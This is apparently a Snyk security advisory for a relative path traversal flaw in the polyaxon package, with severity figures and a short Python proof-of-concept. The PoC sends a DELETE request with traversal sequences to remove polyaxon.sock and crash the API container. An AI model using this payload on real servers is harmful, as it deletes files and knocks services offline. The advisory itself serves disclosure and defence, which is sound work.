Relative Path Traversal Affecting polyaxon package, versions [0,]


Severity

Recommended
0.0
high
0
10

CVSS assessment made by Snyk's Security Team. Learn more

Threat Intelligence

Exploit Maturity
Proof of Concept
EPSS
0.35% (57th percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications

Snyk Learn

Learn about Relative Path Traversal vulnerabilities in an interactive lesson.

Start learning
  • Snyk IDSNYK-PYTHON-POLYAXON-9598251
  • published2 Apr 2025
  • disclosed20 Mar 2025
  • creditHRP

Introduced: 20 Mar 2025

NewCVE-2024-9363  (opens in a new tab)
CWE-23  (opens in a new tab)

How to fix?

There is no fixed version for polyaxon.

Overview

polyaxon is a Command Line Interface (CLI) and client to interact with Polyaxon API.

Affected versions of this package are vulnerable to Relative Path Traversal enabling the deletion of files on the target server. An attacker can delete critical files such as polyaxon.sock to cause a crash of the API container.

PoC


import requests

url = "http://host:8000/streams/v1/x/x/x/runs/%2e%2e/artifacts"
params = {
    "path": "../../../../../polyaxon/web/polyaxon.sock"
}

headers = {
    ...
}

response = requests.delete(url, headers=headers, params=params)

print("Status Code:", response.status_code)
print("Response Text:", response.text)

CVSS Base Scores

version 4.0
version 3.1